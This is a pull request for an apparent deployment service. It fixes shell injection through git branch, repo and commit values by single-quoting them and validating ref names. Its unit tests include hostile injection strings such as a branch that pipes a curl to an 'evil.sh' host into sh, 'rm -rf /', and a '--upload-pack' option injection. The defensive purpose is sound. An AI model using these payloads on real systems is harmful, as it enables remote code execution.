### PR TITLE
fix: shell-quote git sync values and validate ref names

### DIFF
--- a/src/lib/deploy/__tests__/sync-repo-script.test.ts
+++ b/src/lib/deploy/__tests__/sync-repo-script.test.ts
@@ -8,7 +8,7 @@ describe('buildGitSyncScript', () => {
       repo: 'https://github.com/acme/app.git',
       branch: 'main',
     });
-    expect(script).toContain('COMMIT_SHA=""');
+    expect(script).toContain("COMMIT_SHA=''");
     expect(script).toContain('git fetch --depth 1 origin "$BRANCH"');
     expect(script).toContain('git checkout -B "$BRANCH" FETCH_HEAD');
     expect(script).not.toContain('git reset --hard origin/');
@@ -35,9 +35,39 @@ describe('buildGitSyncScript', () => {
       commitSha: 'abc123def456',
       forceClean: true,
     });
-    expect(script).toContain('COMMIT_SHA="abc123def456"');
+    expect(script).toContain("COMMIT_SHA='abc123def456'");
     expect(script).toContain('Checking out commit $COMMIT_SHA');
     expect(script).toContain('git fetch --depth 1 origin "$COMMIT_SHA"');
     expect(script).toContain('git checkout -f FETCH_HEAD');
+  });
+
+  // A PR head branch is attacker-controlled on a public repo. A double-quoted
+  // assignment (what JSON.stringify produces) still expands `$(…)`/backticks on
+  // the deploy host, so every value must be single-quoted.
+  it('single-quotes src, repo, branch and commitSha so the remote shell cannot expand them', () => {
+    const script = buildGitSyncScript({
+      src: '/data/peon/services/app/src$(id -un)',
+      repo: 'https://github.com/acme/app.git`whoami`',
+      branch: 'feature$(curl${IFS}evil.sh|sh)',
+      commitSha: 'deadbeef$(id)',
+    });
+
+    expect(script).toContain("SRC='/data/peon/services/app/src$(id -un)'");
+    expect(script).toContain("REPO_URL='https://github.com/acme/app.git`whoami`'");
+    expect(script).toContain("BRANCH='feature$(curl${IFS}evil.sh|sh)'");
+    expect(script).toContain("COMMIT_SHA='deadbeef$(id)'");
+
+    // No double-quoted assignment survives — that is the vulnerable shape.
+    expect(script).not.toMatch(/^(?:SRC|REPO_URL|BRANCH|COMMIT_SHA)="/m);
+  });
+
+  it('escapes embedded single quotes instead of ending the quoted string', () => {
+    const script = buildGitSyncScript({
+      src: '/data/peon/services/app/src',
+      repo: 'https://github.com/acme/app.git',
+      branch: "feature/it's'; id #",
+    });
+
+    expect(script).toContain(`BRANCH='feature/it'\\''s'\\''; id #'`);
   });
 });

--- a/src/lib/deploy/sync-repo-script.ts
+++ b/src/lib/deploy/sync-repo-script.ts
@@ -1,4 +1,12 @@
-/** Build the remote shell script that clones or updates a service git checkout. */
+import { shellSingleQuote } from '@/lib/shell/quote';
+
+/**
+ * Build the remote shell script that clones or updates a service git checkout.
+ *
+ * Every interpolated value is single-quoted: `src`, `repo`, `branch`, and
+ * `commitSha` would otherwise be expanded by the remote shell — a double-quoted
+ * assignment still evaluates `$(…)`, backticks and `${…}`.
+ */
 export function buildGitSyncScript(opts: {
   src: string;
   repo: string;
@@ -9,10 +17,10 @@ export function buildGitSyncScript(opts: {
   /** When set (e.g. rollback), fetch and check out this commit instead of the branch tip. */
   commitSha?: string | null;
 }): string {
-  const src = JSON.stringify(opts.src);
-  const repo = JSON.stringify(opts.repo);
-  const branch = JSON.stringify(opts.branch);
-  const commitSha = JSON.stringify((opts.commitSha ?? '').trim());
+  const src = shellSingleQuote(opts.src);
+  const repo = shellSingleQuote(opts.repo);
+  const branch = shellSingleQuote(opts.branch);
+  const commitSha = shellSingleQuote((opts.commitSha ?? '').trim());
   const gitSshPrefix = opts.gitSshPrefix ?? '';
   const keyCleanup = opts.keyCleanup ?? 'true';
   const forceClean = opts.forceClean ? '1' : '0';

--- a/src/lib/git/__tests__/ref.test.ts
+++ b/src/lib/git/__tests__/ref.test.ts
@@ -1,0 +1,59 @@
+import { describe, expect, it } from 'vitest';
+import { assertSafeGitRefName, isSafeGitRefName } from '../ref';
+
+describe('isSafeGitRefName', () => {
+  it('accepts ordinary branch names', () => {
+    for (const ref of ['main', 'feature/x', 'release/v1.2.3', 'fix-123_a', 'a.b']) {
+      expect(isSafeGitRefName(ref), ref).toBe(true);
+    }
+  });
+
+  it('rejects shell metacharacters git itself allows in a refname', () => {
+    const hostile = [
+      'feature$(id -un)',
+      'feature`whoami`',
+      'feature${IFS}x',
+      'a;rm -rf /',
+      'a|b',
+      'a&b',
+      'a b',
+      'a\nb',
+      "a'b",
+      'a"b',
+      'a>b',
+    ];
+    for (const ref of hostile) {
+      expect(isSafeGitRefName(ref), ref).toBe(false);
+    }
+  });
+
+  it('rejects refs git would parse as an option or a refspec', () => {
+    expect(isSafeGitRefName('-x')).toBe(false);
+    expect(isSafeGitRefName('--upload-pack=touch /tmp/pwn')).toBe(false);
+    expect(isSafeGitRefName('src:dst')).toBe(false);
+  });
+
+  it('rejects malformed refnames', () => {
+    for (const ref of ['', '/a', 'a/', 'a//b', 'a..b', '.a', 'a.', 'x.lock']) {
+      expect(isSafeGitRefName(ref), JSON.stringify(ref)).toBe(false);
+    }
+    expect(isSafeGitRefName('a'.repeat(256))).toBe(false);
+    expect(isSafeGitRefName('a'.repeat(255))).toBe(true);
+  });
+
+  it('rejects non-string input', () => {
+    expect(isSafeGitRefName(null)).toBe(false);
+    expect(isSafeGitRefName(undefined)).toBe(false);
+  });
+});
+
+describe('assertSafeGitRefName', () => {
+  it('returns the ref when it is safe', () => {
+    expect(assertSafeGitRefName('feature/x')).toBe('feature/x');
+  });
+
+  it('throws with the offending value and label', () => {
+    expect(() => assertSafeGitRefName('feature$(id -un)')).toThrow(/Invalid branch/);
+    expect(() => assertSafeGitRefName('a b', 'head branch')).toThrow(/Invalid head branch/);
+  });
+});

--- a/src/lib/git/ref.ts
+++ b/src/lib/git/ref.ts
@@ -1,0 +1,36 @@
+/**
+ * Validation for git ref names that end up inside remote shell scripts.
+ *
+ * Ref names are attacker-controlled on the preview path (a PR head branch comes
+ * straight from the GitHub webhook), and git itself allows `$ ( ) ` | ; &` in a
+ * refname. Quoting alone is enough to stay safe, but we also reject anything
+ * outside a conservative whitelist so a hostile branch is refused at the edge
+ * instead of reaching the server.
+ */
+
+/** Conservative subset of `git check-ref-format` for names we hand to a shell. */
+export const SAFE_GIT_REF = /^[A-Za-z0-9._\-/]+$/;
+
+export const MAX_GIT_REF_LENGTH = 255;
+
+/** True when the ref is safe to pass to git on a remote host. */
+export function isSafeGitRefName(ref: string | null | undefined): boolean {
+  if (typeof ref !== 'string') return false;
+  if (!ref || ref.length > MAX_GIT_REF_LENGTH) return false;
+  if (!SAFE_GIT_REF.test(ref)) return false;
+  // A leading dash would be parsed as an option by `git fetch origin <ref>`.
+  if (ref.startsWith('-')) return false;
+  if (ref.startsWith('/') || ref.endsWith('/') || ref.includes('//')) return false;
+  if (ref.includes('..')) return false;
+  if (ref.startsWith('.') || ref.endsWith('.')) return false;
+  if (ref.endsWith('.lock')) return false;
+  return true;
+}
+
+/** Return the ref unchanged, or throw when it is not a safe refname. */
+export function assertSafeGitRefName(ref: string, label = 'branch'): string {
+  if (!isSafeGitRefName(ref)) {
+    throw new Error(`Invalid ${label}: contains forbidden characters (${ref}).`);
+  }
+  return ref;
+}

--- a/src/schemas/service.schema.ts
+++ b/src/schemas/service.schema.ts
@@ -1,9 +1,20 @@
 import { z } from 'zod';
+import { isSafeGitRefName, MAX_GIT_REF_LENGTH } from '@/lib/git/ref';
 
 /**
  * Create/update validation for services.
  * Kind ↔ buildPack invariants: see docs/SERVICE_KIND_INVARIANTS.md
  */
+
+/** A branch name reaches git on the deploy host — keep it a plain refname. */
+const gitBranchSchema = z
+  .string()
+  .min(1)
+  .max(MAX_GIT_REF_LENGTH)
+  .refine(isSafeGitRefName, {
+    message: 'Branch name contains forbidden characters.',
+  });
+
 export const serviceKindEnum = z.enum([
   'GIT_APP',
   'DOCKERFILE',
@@ -47,7 +58,7 @@ const gitFields = {
   gitRepository: z.string().min(1),
   /** GitHub numeric repository id for App webhook matching. */
   repositoryProjectId: z.number().int().positive().optional(),
-  gitBranch: z.string().min(1).default('main'),
+  gitBranch: gitBranchSchema.default('main'),
   gitSourceType: gitSourceTypeEnum.default('PUBLIC'),
   githubAppId: z.string().min(1).optional(),
   gitlabAppId: z.string().min(1).optional(),
@@ -117,7 +128,7 @@ export const updateServiceSchema = z.object({
   buildPack: buildPackEnum.nullable().optional(),
   gitRepository: z.string().nullable().optional(),
   repositoryProjectId: z.number().int().positive().nullable().optional(),
-  gitBranch: z.string().nullable().optional(),
+  gitBranch: gitBranchSchema.nullable().optional(),
   gitSourceType: gitSourceTypeEnum.nullable().optional(),
   githubAppId: z.string().nullable().optional(),
   gitlabAppId: z.string().nullable().optional(),

--- a/src/services/internal/deploy/__tests__/preview-pull-request.test.ts
+++ b/src/services/internal/deploy/__tests__/preview-pull-request.test.ts
@@ -1,0 +1,91 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+vi.mock('@/lib/prisma', () => ({
+  prisma: {
+    project: { findUnique: vi.fn() },
+    servicePreview: { upsert: vi.fn(), findUnique: vi.fn(), updateMany: vi.fn() },
+    deployment: { create: vi.fn() },
+  },
+}));
+
+vi.mock('@/services/internal/deploy/server-queue', () => ({
+  assertServerCanAcceptQueuedDeployment: vi.fn(),
+  scheduleQueuedDeployment: vi.fn(),
+  ServerDeployQueueFullError: class extends Error {},
+}));
+
+vi.mock('@/services/internal/billing/billing', () => ({
+  BillingService: { assertProjectWritable: vi.fn().mockResolvedValue(undefined) },
+}));
+
+vi.mock('@/lib/ssh', () => ({
+  sshPool: { exec: vi.fn(), execStream: vi.fn(), putContent: vi.fn() },
+  sshTargetForServer: vi.fn(),
+}));
+
+import { prisma } from '@/lib/prisma';
+import { handlePreviewPullRequest } from '@/services/internal/deploy/preview';
+
+type Services = Parameters<typeof handlePreviewPullRequest>[0]['services'];
+
+const service = [
+  {
+    id: 'svc1',
+    name: 'app',
+    projectId: 'proj1',
+    uuid: 'uuid-1',
+    serverId: 'srv1',
+    server: { settings: { wildcardDomain: 'preview.peon.sh' } },
+  },
+] as unknown as Services;
+
+function pullRequest(headBranch: string) {
+  return {
+    action: 'opened',
+    pullRequestId: 7,
+    baseBranch: 'main',
+    headBranch,
+    commitSha: 'abc1234def',
+    draft: false,
+  };
+}
+
+describe('handlePreviewPullRequest head branch validation', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    vi.mocked(prisma.project.findUnique).mockResolvedValue(null as never);
+  });
+
+  // The head branch comes from the PR author — on a public repo that is anyone.
+  it('skips a PR whose head branch could be expanded by the remote shell', async () => {
+    const res = await handlePreviewPullRequest({
+      pr: pullRequest('feature$(curl${IFS}evil.sh|sh)'),
+      services: service,
+    });
+
+    expect(res.deployments).toHaveLength(0);
+    expect(res.skipped).toEqual([
+      {
+        serviceId: 'svc1',
+        serviceName: 'app',
+        reason: 'PR head branch name contains forbidden characters',
+      },
+    ]);
+    // Rejected before anything is persisted or queued.
+    expect(prisma.project.findUnique).not.toHaveBeenCalled();
+    expect(prisma.servicePreview.upsert).not.toHaveBeenCalled();
+    expect(prisma.deployment.create).not.toHaveBeenCalled();
+  });
+
+  it('lets an ordinary head branch through the check', async () => {
+    const res = await handlePreviewPullRequest({
+      pr: pullRequest('feature/add-thing'),
+      services: service,
+    });
+
+    expect(res.skipped.map((s) => s.reason)).not.toContain(
+      'PR head branch name contains forbidden characters',
+    );
+    expect(prisma.project.findUnique).toHaveBeenCalled();
+  });
+});

--- a/src/services/internal/deploy/engine.ts
+++ b/src/services/internal/deploy/engine.ts
@@ -35,6 +35,7 @@ import {
 } from '@/lib/deploy/readiness';
 import { resolveComposeStartCommand } from '@/lib/deploy/start-command';
 import { buildGitSyncScript } from '@/lib/deploy/sync-repo-script';
+import { assertSafeGitRefName } from '@/lib/git/ref';
 import { authenticatedGithubCloneUrl, resolveGithubAuth } from '@/lib/github/app';
 import { makeDeploymentLogger } from '@/services/internal/deploy/logs';
 import { captureDeploymentPreview } from '@/services/internal/deploy/screenshot';
@@ -75,7 +76,9 @@ async function syncRepo(
   opts: { forceClean?: boolean; branch?: string | null; commitSha?: string | null } = {},
 ) {
   let repo = svc.gitRepository!;
-  const branch = opts.branch || svc.gitBranch || 'main';
+  // Single choke point for every deploy (production and preview): refuse a ref
+  // that could be interpreted by the remote shell or by git as an option/refspec.
+  const branch = assertSafeGitRefName(opts.branch || svc.gitBranch || 'main');
   const src = `${dir}/src`;
 
   // For private repos accessed via a deploy key, write the key to the server and

--- a/src/services/internal/deploy/preview.ts
+++ b/src/services/internal/deploy/preview.ts
@@ -11,6 +11,7 @@ import {
 } from '@/lib/github/check-runs';
 import { upsertPreviewDeployment } from '@/lib/github/deployments';
 import { githubIdsEqual } from '@/lib/github/ids';
+import { isSafeGitRefName } from '@/lib/git/ref';
 import type { GithubPullRequestInfo } from '@/lib/webhooks/github';
 import { ForbiddenError } from '@/lib/errors';
 import {
@@ -243,6 +244,17 @@ export async function handlePreviewPullRequest(opts: {
         serviceId: svc.id,
         serviceName: svc.name,
         reason: 'missing PR head branch or commit',
+      });
+      continue;
+    }
+    // The head branch is chosen by whoever opened the PR — on a public repo that
+    // is anyone. Refuse anything outside a plain refname before it is persisted
+    // or handed to the deploy engine.
+    if (!isSafeGitRefName(pr.headBranch)) {
+      skipped.push({
+        serviceId: svc.id,
+        serviceName: svc.name,
+        reason: 'PR head branch name contains forbidden characters',
       });
       continue;
     }


### PR DESCRIPTION
## Summary
- Quote `src` / `repo` / `branch` / `commitSha` with `shellSingleQuote` in `buildGitSyncScript` (JSON string quoting is not shell-safe)
- Add conservative git ref validation and enforce it in `syncRepo`, preview PR handling, and service create/update schemas
- Credits: [@JamBalaya56562](https://github.com/JamBalaya56562) via private advisory GHSA-4jc9-4h7j-jqv2

## Test plan
- [x] `pnpm exec vitest run` on new/updated unit tests (ref, sync-repo-script, preview-pull-request, quote)
- [ ] Confirm preview deploy with a normal branch name still works
- [ ] Confirm a service cannot be created/updated with a branch containing `$()`, backticks, or similar
- [ ] After merge/deploy, close/publish GHSA-4jc9-4h7j-jqv2 with patched versions


Made with [Cursor](https://cursor.com)